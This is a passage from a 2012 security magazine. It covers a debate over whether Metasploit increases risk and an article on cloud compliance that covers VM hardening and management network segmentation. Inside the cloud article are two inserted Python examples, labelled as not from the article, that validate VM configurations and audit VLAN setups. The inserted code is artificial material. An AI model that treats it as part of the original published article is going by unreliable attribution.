“Metasploit, like other dual-use security tools, is great at raising awareness and providing defenders with a way to measure their risk,” Moore says. “The availability of clean exploits to the public at large has helped level the playing field against criminals.” Additionally, Moore points out that nearly every recent client-side exploit (those found in Internet Explorer, Adobe Flash, Java, etc.) placed into Metasploit was discovered first in the wild, and then ported from that live sample into a clean version of the toolset.

Not everyone agrees with Moore’s assertion that Metasploit “helps to level the playing field.” “While it’s correct to say that individual organizations can reduce their own risk with tools like Metasploit, in the aggregate everyone’s risk is increased significantly,” argues Pete Lindstrom, research director at security research firm Spire Security. “The attackers can hit long before most organizations have time to patch.”

In-the-field practitioners and software vulnerability researchers take a different view of Metasploit’s applicability. “You can’t be a car mechanic and fix an engine without tools. And you can’t be a penetration tester and fix bad system security without evaluating the security of those systems. If tools like Metasploit were not available, the bad guys would be writing their own tools anyway. That would leave the good guys unarmed,” says David Litchfield, chief security architect at Denver-based security firm Accuvant Labs.

Marcus Ranum, chief of security at Columbia, Md.-based Tenable Network Security, says there are no easy answers when it comes to Metasploit. “To properly answer the question whether Metasploit increases or decreases risk would take a matter of days, and I’m not sure we’d get to a conclusive answer,” he says. “If you had asked me this question a few years ago, I would have answered that Metasploit absolutely increases risk. It basically encourages weaponizing. It’s as if we are a people who are living in glass houses and it’s weaponizing stone throwers. It’s just not a good idea,” Ranum says.

“But I’ve come to realize that the relationship is more complex than that. It’s more of a co-evolutionary process,” he adds. “Tools like Metasploit do make it easier for people to exploit stuff, which then puts pressure on system owners to harden them. It may force an immune response from the community that you would not probably get otherwise.”

METASPLOIT REVIEW: PUSHING BOUNDARIES

Few security tools spark such diverse opinions. And that may be why few are more famous, or infamous, than Metasploit. Developed roughly a decade ago (2003), the toolset became the open source platform for developing software security exploits. Eventually, Metasploit grew to become a large community-based open source effort. According to Moore, in a typical month there are about 65,000 unique downloads of the Metasploit installer, with more than 170,000 additional unique IP addresses updating their Metasploit software. In the past year, more than one million unique downloaders have accessed the Metasploit update server. Today, it is one of the most recognizable tools used by security professionals to exploit vulnerable systems. Metasploit also contains tools used to thwart computer forensic investigations and to conduct attacks while evading intrusion detection systems.

A decade ago software vulnerability research was much more controversial than it is today. Most major software vendors were more defensive when it came to researchers identifying flaws in their code. Many—if they didn’t try to legally squash the voice of the researcher, or deny the flaw existed—would downplay the seriousness of the flaw. For these reasons, many in the software research community argued that tools such as Metasploit were necessary to demonstrate a vulnerability was real and that it was exploitable.


“Such tools were absolutely necessary for penetration testers to demonstrate that IT systems were vulnerable to attack,” says Shawn Moyer, practice manager at Accuvant Labs. “It played an important role then, and it still does today, at helping organizations to identify and reduce risk.”

At the time he created Metasploit, Moore was head of a penetration testing team, responsible for maintaining the team’s approved set of tools for customer engagements. “Exploit code in particular was hard to maintain, buggy and often required major changes to adapt to a particular assessment,” he says. “The primary goal was to replace an in-house collection of exploits with a single tool that had a consistent user interface and was easier to maintain.”

Many contend that the ease of use provided by Metasploit has lowered the skill barrier to successfully conducting attacks. That is the concept behind Joshua Corman’s theoretical “HD Moore’s Law,” which states, “Casual attacker power grows at the rate of Metasploit.” Corman is the director of security intelligence at Akamai Technologies.

“That is exactly right. A tool like Metasploit really becomes the low bar, because anybody can download it; anybody can use it. It’s reasonably functional and getting even more so,” says Mike Rothman, an analyst and president at Phoenix-based IT security research firm Securosis. “If your company’s defense can’t protect from a fairly simplistic Metasploit attack, or from any open, well proliferated tools, it’s going to be a long day in the office when you are attacked. In that respect, Metasploit has helped to raise the bar in terms of where defenses are for the people that care and actually use it to test their program. I also think it’s made it easier for a lot of bad people to ultimately launch successful attacks.”

METASPLOIT’S RISK IMPACT

The question remains whether, on balance, Metasploit has improved or reduced risk. “I honestly don’t think we know enough about the overlap of all of these mechanisms,” says Ranum, when considering the increased ease and availability of attack tools vs. the actions administrators take to secure and harden their systems when exploits and attacks surface.

The discussion over whether such tools increase or decrease risk harks back to the full vulnerability disclosure debate. Such arguments over the dangers of publicly available exploit code are not academic, as the attacks against unpatched versions of Java 7 this summer reminded everyone. This kind of attack activity has been going on for some time. In 2003, the SQL Slammer worm hit 75,000 systems and was based largely on a proof of concept (for which a patch was available) that exploited a buffer overflow developed and presented at the Black Hat conference by Litchfield. Today, Litchfield says the incident changed his perspective on vulnerability disclosure.

“When SQL Slammer appeared, it shook my academic bubble. I no longer viewed this work as merely an intellectual pursuit. Disclosure has real-world impact, and lives could even be at risk,” he says. “This isn’t a binary issue. It’s more octal. We need to conduct research, but have to consider the impact of our actions.”

Almost paradoxically, some see Metasploit and tools like it as a possible defense against such attacks. “Once the exploit, virus or worm surfaces, the existence of these attacks means the existence of Metasploit isn’t as dangerous as it could be, because we are already working to protect from these attacks. Conversely, the existence of Metasploit also means these attacks aren’t as dangerous. Both sides of this equation are interfering with us in a way that’s unpleasant, but perhaps it beats the alternative of these attacks coming out of the blue more often,” Ranum says.

A POUND OF PREVENTION

Some governments don’t view the issue objectively. A number have striven to outlaw the publication of exploits, malware and security research tools. For instance, the Japanese government recently passed a law that criminalized the creation and dissemination of certain types of computer malware. In 2007, Germany passed a law that outlawed computer exploits and “hacking tools.”

In the U.S., similar laws have made little headway, although attempts to control security tools have surfaced. For instance, following a series of worm outbreaks, software developer Tom Liston created an application dubbed LaBrea that trapped attacking worms and hackers. He temporarily pulled the tool’s availability after an Illinois law made it illegal to create a device that was capable of disrupting communication services without the authorization of the service provider. Other laws, such as the Digital Millennium Copyright Act (DMCA) of 1998 and a number of state variants, have cooled security research over the years.


Many believe such laws have the reverse impact of their intention to improve safety. “The countries that have the harshest regulations for security tools have actually seen a marked decrease in overall security awareness and innovation,” Moore argues.

Still, few would expect the call for such laws to wane any time soon. With the recent attention on cyberwar, the idea of software exploits and hacking tools as weapons of war is gaining ground. As such, there is a greater call for tools to be banned or regulated by international treaties. Some argue those treaties will be of little value, because hacking tools are too easy to create and hide. Late last year, members of the Shanghai Cooperation Organization, which include China, Russia, Kazakhstan, Kyrgyzstan and others, proposed the International Code of Conduct for Information Security, but it was rejected by the U.S. over free speech concerns.

“Banning cyberweapons entirely is a good goal, but almost certainly unachievable,” wrote Bruce Schneier, IT security author and chief security technology officer at BT, in a U.S. News & World Report essay. “More likely are treaties that stipulate a no-first-use policy, outlaw un-aimed or broadly targeted weapons, and mandate weapons that self-destruct at the end of hostilities. Treaties that restrict tactics and limit stockpiles could be a next step. ... Yes, enforcement will be difficult. Remember how easy it was to hide a chemical weapons facility? Hiding a cyberweapons facility will be even easier.”

However, such talk around restricting security research, hacking and attack tools will do little to directly protect the typical enterprise, which is also engaged in a smaller arms race of its own. In fact, enterprises may be much better off using tools like Metasploit to protect their own environments.

“There will always be thoughts around trying to secure infrastructure by controlling access to information and these tools,” Rothman says. “Consider the vulnerability scanners SATAN, Nmap or Nessus. Look back through information security history and there are always new tools that enabled attackers and defenders to do things better and faster. You can’t stop progress.”

As part of that progress, Metasploit is about to turn 10. Are we more secure as a result? The best answer may not be a simple yes or no, but rather: If we want to be.

GEORGE V. HULME writes about IT security from his home in Minneapolis. Send comments on this feature to [email protected]


By Davi Ottenheimer

CLOUD COMPUTING

TACKLING COMPLIANCE IN THE CLOUD

Moving to a cloud environment brings compliance challenges, but they’re not insurmountable.

MOST ORGANIZATIONS ALREADY have started to use virtualization technology or cloud computing. Yet some still may be reluctant to move their mission-critical—tier-1—applications to these relatively new environments. While the flexibility and cost benefits of virtualization are widely accepted, questions linger on how to adapt to new and different risks. Security and compliance top the list of organizations’ reasons to delay adoption.

Concerns about security in a virtual environment almost always begin with a study of the relationship between guest and host. That is just the tip of the iceberg. In the end a far more comprehensive view of risk management is necessary, which includes virtual machines (VMs), hypervisors, networking, storage and management. From configuration of software-based networking devices to software-based data centers, the processes and procedures for managing resources are an important part of an assessment of cloud risk and compliance. An assessor not only will review configuration of the VM and hypervisor technology, but also look at how logical concepts such as port groups, resource pools and clusters are being managed in relation to data flows and business logic.

Let’s take a look at some of the ways virtualization and cloud computing impact compliance and how organizations can tackle cloud compliance issues.

START WITH A STANDARD BASELINE

A good strategy to manage cloud compliance is to establish a clear and transparent relationship with a cloud service provider. This can be facilitated by standards such as SSAE 16 SOC 2 or ISO 27001. A framework that both parties can agree on makes it easier to work through the sections and focus on resolving areas of concern. A provider that refuses to allow on-site physical assessments, for example, may not be acceptable to an assessor or a cloud customer. The concern is that, despite what cloud providers say about identical controls in their many physical locations, which can be verified on paper, the human element of managing controls can still cause controls to drift out of place and warrant on-site audits.

Perhaps the easiest way to work through cloud compliance challenges with cloud providers is to approach them first at a technical level and in terms of how compliance has been handled in the past. An operating system has typically been brought into compliance by hardening it to a set of published guidelines. Systems within government must adhere to a set of documented security standards, such as the U.S. Defense Information Systems Agency (DISA) Security Technical Implementation Guide (STIG), or publications from the National Institute of Standards and Technology (NIST). Systems within a commercial environment may need to be measured against completely different guidelines from the Center for Internet Security (CIS) or by an industry group such as the Payment Card Industry (PCI) Security Standards Council (SSC). Like the ISO and SSAE 16 standards, although with a regulatory authority overseeing their adoption, they can help clarify what exactly has to be done by a provider to achieve compliance.


TAKE CONTROL OF CONTINUOUS CHANGE

Let’s say that a Windows 7 system on hardware could be configured to meet the CIS Benchmark version 1.2.0 released on March 30. Move that same Windows 7 system from hardware to a VM on a hypervisor managed by a provider and an assessment of compliance for that system can be seriously different. Move it into a cloud environment and it changes again. The operating system itself remains almost identical, but an updated benchmark is required to account for the relationship with the hypervisor and then the systems used to manage hypervisor resources. Consequently, hardening takes on new and different meanings based on virtualization and how it is managed. Why? The flexibility and efficiencies of cloud mean new and different configuration options, which have different risks compared to hardware-based infrastructure.

For example, a hardware-based operating system will have configuration files that define storage. Migration to a virtual machine means the configuration files that describe the hardware move outside the system and onto the hypervisor. The boundaries for a VM are defined by those configuration files. In other words, a Red Hat Enterprise Linux system would normally use a configuration file in the OS (e.g. /etc/fstab) to determine which hardware file systems to mount when it boots. The OS file has to be very particular to the equipment it was installed with (e.g. bus type, file system type, partition number). Virtualization, however, will make the same file in the OS generic to reflect the typical—or at least reduced—set of options available from the hypervisor. It then moves the hardware details to a file read by the hypervisor but invisible to the VM’s OS.

In terms of compliance, this means there has to be a shift in how to assess technical controls when looking at a virtual environment. A hypervisor should put a VM in a sandbox, isolated from other VMs. The sandbox is defined in part by how the hypervisor controls access to its hardware. A VM therefore should have no expectation that it can achieve direct hardware access by changing its configuration file; it should only see what it is provided. At a cloud provider level, this means a provider always should be validating configuration information that is uploaded with a VM before allowing that VM to run. A simple failure to validate a VM setting, such as allowing a VM to directly mount hypervisor storage, could potentially compromise other VM data on that hypervisor. Optical drives have little or no need to be connected to a VM in a data center environment, so they usually can be disabled. Likewise, attacks on serial and parallel ports do not work if those ports are disabled.

The key to this example is that a customer will need to know whether a provider validates VMs and disables unused or unnecessary features. It is the same concept as traditional compliance requirements—validate input and reduce the attack surface—but applied to the new processes and control points of cloud.
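An added example (not from the article or from VMware) of the provider-side gate this section calls for: a Python check that parses an uploaded VMware-style .vmx file, rejects malformed input, and refuses to admit a VM that presents an optical drive, a serial or parallel port, or a disk backed by a hypervisor device path. The sample configurations are constructed; the device-path prefixes and the `rawDisk` marker are assumptions for the example, not a VMware rule.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample in VMware .vmx style (key = "value" per line). It is not a
# real customer VM; it deliberately carries the three problems the article names.
SAMPLE_VMX = '''\
.encoding = "UTF-8"
config.version = "8"
displayName = "tier1-app-01"
scsi0.present = "TRUE"
scsi0:0.present = "TRUE"
scsi0:0.fileName = "tier1-app-01.vmdk"
scsi0:1.present = "TRUE"
scsi0:1.fileName = "/vmfs/devices/disks/naa.6000000000000000000000000000000"
ide1:0.present = "TRUE"
ide1:0.deviceType = "cdrom-raw"
serial0.present = "TRUE"
parallel0.present = "FALSE"
'''

# The same VM after the provider's hardening: own .vmdk only, no optical drive,
# no serial port. Constructed for the comparison below.
HARDENED_VMX = '''\
.encoding = "UTF-8"
config.version = "8"
displayName = "tier1-app-01"
scsi0.present = "TRUE"
scsi0:0.present = "TRUE"
scsi0:0.fileName = "tier1-app-01.vmdk"
ide1:0.present = "FALSE"
serial0.present = "FALSE"
parallel0.present = "FALSE"
'''

ENTRY_RE = re.compile(r'^\s*([\w.:-]+)\s*=\s*"([^"]*)"\s*$')

# Assumption for this example: a disk fileName under one of these prefixes means
# the VM is being handed a hypervisor-owned device rather than its own .vmdk.
HOST_DEVICE_PREFIXES = ("/vmfs/devices/", "/dev/")


def parse_vmx(text: str) -> Dict[str, str]:
    """Parse key = "value" entries. A line that does not fit the grammar is an
    error, not silently skipped: input the provider cannot interpret must not be
    accepted on the assumption that the hypervisor will ignore it."""
    cfg: Dict[str, str] = {}
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = ENTRY_RE.match(line)
        if m is None:
            raise ValueError(f"line {lineno}: malformed entry {line!r}")
        cfg[m.group(1)] = m.group(2)
    return cfg


def _is_true(cfg: Dict[str, str], key: str) -> bool:
    return cfg.get(key, "FALSE").strip().upper() == "TRUE"


def find_violations(cfg: Dict[str, str]) -> List[str]:
    """Return one finding per device that widens the VM's sandbox."""
    findings: List[str] = []
    for key, value in sorted(cfg.items()):
        device, _, attr = key.rpartition(".")
        # Unused ports: a serial or parallel device that is present.
        if attr == "present" and _is_true(cfg, key):
            if re.fullmatch(r"(serial|parallel)\d+", device):
                findings.append(f"{device}: {device.rstrip('0123456789')} port present")
        # Optical drive: a device of a cdrom type whose .present flag is TRUE.
        if attr == "deviceType" and value.startswith("cdrom") and _is_true(cfg, f"{device}.present"):
            findings.append(f"{device}: optical drive present ({value})")
        # Direct hypervisor storage: a disk backed by a host device path or raw mapping.
        if attr == "fileName" and value.startswith(HOST_DEVICE_PREFIXES):
            findings.append(f"{device}: disk backed by host device {value}")
        if attr == "deviceType" and value == "rawDisk":  # assumed raw-mapping marker
            findings.append(f"{device}: raw device mapping")
    return findings


def admit_vm(vmx_text: str) -> Tuple[bool, List[str]]:
    """Gate run before a VM is allowed to start: (admitted, findings)."""
    findings = find_violations(parse_vmx(vmx_text))
    return (len(findings) == 0, findings)


if __name__ == "__main__":
    for label, text in (("uploaded", SAMPLE_VMX), ("hardened", HARDENED_VMX)):
        ok, problems = admit_vm(text)
        print(f"{label}: {'admit' if ok else 'reject'}")
        for p in problems:
            print("  -", p)
```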

While the requirements in regulations do not yet spell out this level of technical detail for provisioning and de-provisioning systems, they do have language that is relevant and useful to assessors. The PCI Data Security Standard (DSS) version 2.0 states in Requirement 2.2 that a regulated entity must “develop configuration standards for all system components. Assure that these standards address all known security vulnerabilities and are consistent with industry-accepted system hardening standards.”

Cloud providers and vendors already are stepping forward to address the language of this regulatory requirement for standards. New security and compliance products, as well as detailed hardening guidelines, address the need for industry-accepted control requirements or recommendations. VMware’s vCenter Configuration Manager (VCM) is the type of tool that customers can request from their cloud providers to get a centralized and continual collection of configuration changes to infrastructure. A unified report will show systems that are out of sync with vendor hardening guides, or in violation of policy or regulations such as SOX, PCI DSS, HIPAA and FISMA. An emerging standard called the NIST Security Content Automation Protocol (SCAP), also supported by VCM, can even provide a detailed guide on current security configuration of operating systems and applications.

ESTABLISH TRUSTED ZONES

Software-based networks also can be a sticking point for compliance. Segmentation between VMs, explained above in terms of the hypervisor, also is relevant to the configuration and maintenance of virtual switches. The migration of a VM from one hypervisor to another is often done in the clear for reasons of performance and availability. In other words, the VMs are sent by providers without encryption, so anyone with access to the network could potentially intercept and view or modify data. The memory contents of a VM could be viewed or altered. Confidentiality and integrity both are at risk when this is the configuration.

To reduce the risk of these attacks, the hypervisor’s management-related traffic should be placed on isolated, dedicated networks that are non-routable (i.e. no Layer 3 route to other networks). The port group should be on a dedicated VLAN. The virtual switch can be shared, but the management port group’s VLAN should never have any other VM connected to it. This also makes it possible to monitor for that VLAN ID appearing on other port groups. Another option is to separate the port group further with a management-dedicated virtual switch and to monitor that switch for non-management traffic.

Taking this one step further, a management network should be set up at a cloud provider to restrict access only to known endpoints. Although requirements such as PCI DSS do not explicitly state this, the PCI Security Standards Council (SSC) in 2011 made it clear with the publication of its virtualization guidelines that reducing the management interface attack surface is a best practice. An attacker is likely to target the network to gain privileged access to a cloud provider’s management interface.

That is why the management layer should be protected by giving it a dedicated VLAN for the management port group on a shared virtual switch. Other VM traffic may be allowable on a switch if the port group for the management VLAN is restricted only to management traffic. An additional level of security, such as stateful packet inspection and intrusion detection monitoring, will help further segment the traffic and tends to be required under some regulations such as PCI DSS. An even better step to segment management communication is to move the management VLAN to a dedicated virtual switch that does not allow for any non-management port groups. The network segment also should not be routed except to other isolated and protected management networks.
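The checks described across the last three paragraphs, as an added example that is not from the article or from any vendor tool: a Python audit over a constructed vSwitch and port-group inventory that flags a management VLAN reused by another port group, a VM attached to the management port group, a Layer 3 route from the management network to a non-management one and, in strict mode, a management port group sharing a switch with other roles. A second function applies the “monitor for that VLAN ID on other port groups” idea to constructed tag observations. The dataclass fields and the role labels are assumptions made for the example.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Set, Tuple


@dataclass
class PortGroup:
    name: str
    vlan: int
    role: str                      # assumed labels: "management", "vmotion" or "vm"
    attached_vms: List[str] = field(default_factory=list)
    routes_to: List[str] = field(default_factory=list)   # port groups reachable at Layer 3


@dataclass
class VSwitch:
    name: str
    port_groups: List[PortGroup]


# Constructed inventory for two hosts; it is not taken from any real environment and
# deliberately carries the mistakes the article warns about.
INVENTORY: List[VSwitch] = [
    VSwitch("vSwitch0", [
        PortGroup("Mgmt", vlan=10, role="management",
                  attached_vms=["jumpbox-01"], routes_to=["Mgmt-DR", "Corp-LAN"]),
        PortGroup("Prod-Web", vlan=20, role="vm", attached_vms=["web-01", "web-02"]),
    ]),
    VSwitch("vSwitch1", [
        PortGroup("Mgmt-DR", vlan=11, role="management", routes_to=["Mgmt"]),
        PortGroup("Backup", vlan=10, role="vm", attached_vms=["bkp-01"]),
        PortGroup("Corp-LAN", vlan=40, role="vm", attached_vms=["app-01"]),
    ]),
]

# Constructed observations from a switch monitor: (port group, 802.1Q tag seen on it).
OBSERVED_TAGS: List[Tuple[str, int]] = [("Prod-Web", 20), ("Prod-Web", 10), ("Mgmt", 10)]


def _index(switches: List[VSwitch]) -> Tuple[List[PortGroup], Dict[str, str], Set[int]]:
    pgs = [pg for sw in switches for pg in sw.port_groups]
    role_of = {pg.name: pg.role for pg in pgs}
    mgmt_vlans = {pg.vlan for pg in pgs if pg.role == "management"}
    return pgs, role_of, mgmt_vlans


def audit_management_segmentation(switches: List[VSwitch], strict: bool = False) -> List[str]:
    """Configuration side: findings against the article's management-network rules."""
    pgs, role_of, mgmt_vlans = _index(switches)
    findings: List[str] = []
    # 1. A management VLAN ID must not be reused by any non-management port group.
    for pg in pgs:
        if pg.role != "management" and pg.vlan in mgmt_vlans:
            findings.append(f"{pg.name}: VLAN {pg.vlan} is a management VLAN but the port group role is {pg.role}")
    for pg in pgs:
        if pg.role != "management":
            continue
        # 2. No VM may be connected to the management port group.
        for vm in pg.attached_vms:
            findings.append(f"{pg.name}: VM {vm} is attached to the management port group")
        # 3. The management network routes only to other management networks.
        for dst in pg.routes_to:
            if role_of.get(dst) != "management":
                findings.append(f"{pg.name}: Layer 3 route to non-management network {dst}")
    # 4. Stricter option from the article: management port group on a dedicated switch.
    if strict:
        for sw in switches:
            roles = {pg.role for pg in sw.port_groups}
            if "management" in roles and roles != {"management"}:
                others = ", ".join(sorted(roles - {"management"}))
                findings.append(f"{sw.name}: management port group shares the switch with {others} port groups")
    return findings


def leaked_management_tags(switches: List[VSwitch], observed: List[Tuple[str, int]]) -> List[str]:
    """Detection side: a management VLAN tag seen on a non-management port group."""
    _, role_of, mgmt_vlans = _index(switches)
    return [f"{pg}: management VLAN {vlan} tag seen on a {role_of.get(pg, 'unknown')} port group"
            for pg, vlan in observed
            if vlan in mgmt_vlans and role_of.get(pg) != "management"]


if __name__ == "__main__":
    for line in audit_management_segmentation(INVENTORY, strict=True):
        print("config:", line)
    for line in leaked_management_tags(INVENTORY, OBSERVED_TAGS):
        print("traffic:", line)
```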

Another important step in overcoming cloud compliance challenges is related to the human element: the cloud provider’s administrators and users must be trained on policy and procedures. SSL certificates not only have to be carefully managed and secured, but the administrators themselves also have to be vigilant about verifying SSL certificates before entering their passwords.


Impersonation of a VMware vCenter Server or vCloud Director with an incorrect SSL certificate would force the client software to display a security warning. An administrator might override the warning if he or she isn’t properly trained to report it and/or investigate the error as a security incident.

COMPLIANCE AS A COST-SAVER

One of the more interesting effects of cloud environments is that, when engineered properly, they actually can reduce compliance costs while improving security coverage. Anti-malware controls are an excellent example of how automation and consolidation reduce overhead. There is no doubt that antivirus is required under practically every regulation; from SOX to PCI DSS, there is a need to prevent unauthorized code. Requirement 5 of PCI DSS v2 states simply, “Use and regularly update antivirus software or programs.” Finding viruses with an ever-increasing blacklist is a resource-intensive process. Software to catch viruses tends to disappear into the underutilized capacity common on dedicated hardware. A virtual environment, by comparison, makes far more efficient use of shared hardware; however, VMs can end up performing scans in competition with each other out of a limited pool of resources.

Hypervisor companies and their antivirus vendor partners are working to address this problem. For example, VMware’s vShield Endpoint offloads work from VMs to a shared and dedicated security VM on the same host. Centralized control and elimination of redundant load means a dedicated agent per VM is no longer necessary for virtual environments to achieve compliance requirements. The increased efficiency, while performing the same or better level of protection and compliance, might seem familiar to those wanting to move to the cloud.

Consider how taking this newly centralized model of compliance in the cloud can affect the storage footprint for each VM versus a traditional anti-malware agent. The traditional agent, plus several signature files for rollback capability, often is several GB in size. For the sake of argument, run a quick calculation for 1,000 VMs on 10 hosts with an anti-malware footprint of roughly 5 GB per host and SAN storage for the VM at $5K per TB:

(1,000 VM) x (5 GB per VM) = 5 TB
5 TB x ($5K per TB on SAN) = $25,000 in host-based antivirus storage space


Next, for comparison, run a calculation for a host running anti-malware on behalf of the VMs. The host-based anti-malware is likely to be larger than a VM anti-malware agent, so 7 GB instead of 5 GB gives the following result:

(10 hosts) x (7 GB per host) = 70 GB
0.07 TB x ($5K per TB on SAN) = $350

The cost savings for cloud compliance using a host-based anti-malware model shows storage is reduced by more than $24K (or $24 per VM) and saves 4 TB. Network resource benefits also are possible. The hypervisor-based solution downloads malware signatures once for all the guests on a host; 10 systems have to communicate updates and events instead of 1,000. Factoring in keep-alive packets, scan start/stop status and signatures for 1,000 systems is roughly 2 MB of overhead that could be eliminated from the network. A carefully planned and controlled cloud provider environment may therefore find significant financial benefits when properly addressing the challenges of cloud compliance.

Today, organizations are eager to take advantage of the cost efficiencies of cloud computing, but they need to ensure the move won’t jeopardize their compliance efforts. Emerging standards and improved solutions from vendors are helping to guide customers and their providers to comply with many governmental and industry regulations. In some cases, it is proving easier to be compliant in the cloud than ever before.

DAVI OTTENHEIMER is president of security consultancy flyingpenguin and author of the new book Securing the Virtual Environment: How to Defend the Enterprise Against Attack. He is a QSA and PA-QSA for K3DES with more than 17 years of experience in security operations and assessments, including a decade of leading incident response and digital forensics. Davi formerly was global communication security manager at Barclays Global Investors and a “Dedicated Paranoid” at Yahoo responsible for digital home, broadband and mobile security. Send comments on this article to [email protected].


EDITOR Marcia Savage

SENIOR MANAGING EDITOR Kara Gattine

SENIOR SITE EDITOR Eric Parizo

NEWS DIRECTOR Robert Westervelt

DIRECTOR OF ONLINE DESIGN Linda Koury

COLUMNISTS Marcus Ranum, Doug Jacobson, Julie A. Rursch

CONTRIBUTING EDITORS Michael Cobb, Scott Crawford, Peter Giannoulis, Ernest N. Hayden, Jennifer Jabbusch Minella, David Jacobs, Diana Kelley, Nick Lewis, Kevin McDonald, Sandra Kay Miller, Ed Moyle, Lisa Phifer, Ben Rothke, Anand Sastry, Dave Shackleford, Joel Snyder, Lenny Zeltser

USER ADVISORY BOARD Phil Agcaoili, Cox Communications; Richard Bejtlich, Mandiant; Seth Bromberger, Energy Sector Consortium; Mike Chapple, Notre Dame; Brian Engle, Health and Human Services Commission, Texas; Mike Hamilton, City of Seattle; Chris Ipsen, State of Nevada; Diana Kelley, Security Curve; Nick Lewis, Saint Louis University; Rich Mogull, Securosis; Tony Spinelli, Equifax; Matthew Todd, Financial Engines

VICE PRESIDENT/GROUP PUBLISHER Doug Olender, [email protected]

ASSOCIATE PUBLISHER Scott Kelly, [email protected]

TECHTARGET 275 Grove Street, Newton, MA 02466, www.techtarget.com

© 2012 TechTarget Inc. No part of this publication may be transmitted or reproduced in any form or by any means without written permission from the publisher. TechTarget reprints are available through The YGS Group.

About TechTarget: TechTarget publishes media for information technology professionals. More than 100 focused websites enable quick access to a deep store of news, advice and analysis about the technologies, products and processes crucial to your job. Our live and virtual events give you direct access to independent expert commentary and advice. At IT Knowledge Exchange, our social community, you can get advice and share solutions with peers and experts.

Cover and Awards feature: Getty Images/Rubberball